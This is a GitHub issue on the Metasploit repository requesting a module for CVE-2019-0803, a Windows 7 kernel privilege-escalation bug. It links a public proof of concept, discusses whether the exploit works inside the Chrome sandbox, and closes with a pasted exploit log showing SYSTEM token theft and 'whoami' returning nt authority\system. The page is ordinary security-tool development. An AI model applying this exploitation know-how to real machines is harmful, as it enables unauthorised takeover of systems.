search

rapid7 / metasploit-framework

Metasploit Framework
https://www.metasploit.com/
Other
34.04k stars 13.94k forks source link

Add CVE-2019-0803 #13110

Open kokxxoo opened 4 years ago

kokxxoo commented 4 years ago

支持32/64位Win7SP1的CVE-2019-0803 PoC https://bbs.pediy.com/thread-253465.htm CVE-2019-0803复现调试笔记 https://bbs.pediy.com/thread-252645.htm 0803漏洞利用分析 https://bbs.pediy.com/thread-252447.htm

poc https://github.com/ExpLife0011/CVE-2019-0803

timwr commented 4 years ago

Any idea if this is accessible from the Chrome sandbox on Windows 7? The proof of concept (https://github.com/ExpLife0011/CVE-2019-0803) seems to rely on starting itself (twice) with CreateProcess in order to create a DDEServer and DDEClient. I tried re-writing it to use threads instead but it's not working :(

tekwizz123 commented 4 years ago

@timwr Took a brief look over it and I didn't see anything too unusual about it, though I imagine one would need a closer inspection to be sure. Chrome sandbox, at least on Windows 7, doesn't have the win32k system call filtering that Windows 8 and later do, so the calls should in theory go through fine. Obviously some parts might need to be redone a bit to work inside the sandbox though.

timwr commented 4 years ago

The win32 APIs should be accessible, it's the way it spawns a new process for the DDEServer and DDEClient: https://github.com/ExpLife0011/CVE-2019-0803/blob/master/win7sp1/poc_test/main.cpp#L407 https://github.com/ExpLife0011/CVE-2019-0803/blob/master/win7sp1/poc_test/main.cpp#L558 that I'm not sure about.

kokxxoo commented 4 years ago

不确定 `Run CMD: whoami

POC - CVE-2019-0803

[+]WND1: FFFFF900C0826B90, WND2: FFFFF900C0826CC0 [+]trying 0 times []DDEServer..PID: 1348 []g_ClientCopyDDEIn1_ContinueAddr:00000000774530AC, g_BitMapAddr:00000000000000 00 [!]xxTriggerExploitEx Success []DDEServer Set BitmapAddr..0000000020050478 []DDEClient..PID: 2884 []DDEClientSendDDEMsg over.. [+]hTriggerWindow 000000000002061C []DDEServer exit.. [+]Wait [+]SetDIBColorTable OK []text: [+]hTriggerWindow OK []Searching for current processes EPROCESS structure ptiaddress == fffff900c0173c30 tagTHREAD == fffffa80345ccb60 kapc_stateAddr == fffffa80345ccbb0 Original security token pointer: 0xfffff8a00ba35a97 [*]Searching for SYSTEM security token address Next eprocess address: 0xfffffa80345ceb30 Found pid: 0x544 Next eprocess address: 0xfffffa80345d05d0 Found pid: 0xB44 Next eprocess address: 0xfffff80001a43a08 Found pid: 0x32F214F8 Next eprocess address: 0xfffffa8030ea4040 Found pid: 0x4 target process found! [+]Security token to steal: 0xfffff8a000004bb6 Run Cmd... [+] Trying to execute "whoami" as SYSTEM... [+] Process created with pid 2260! nt authority\system `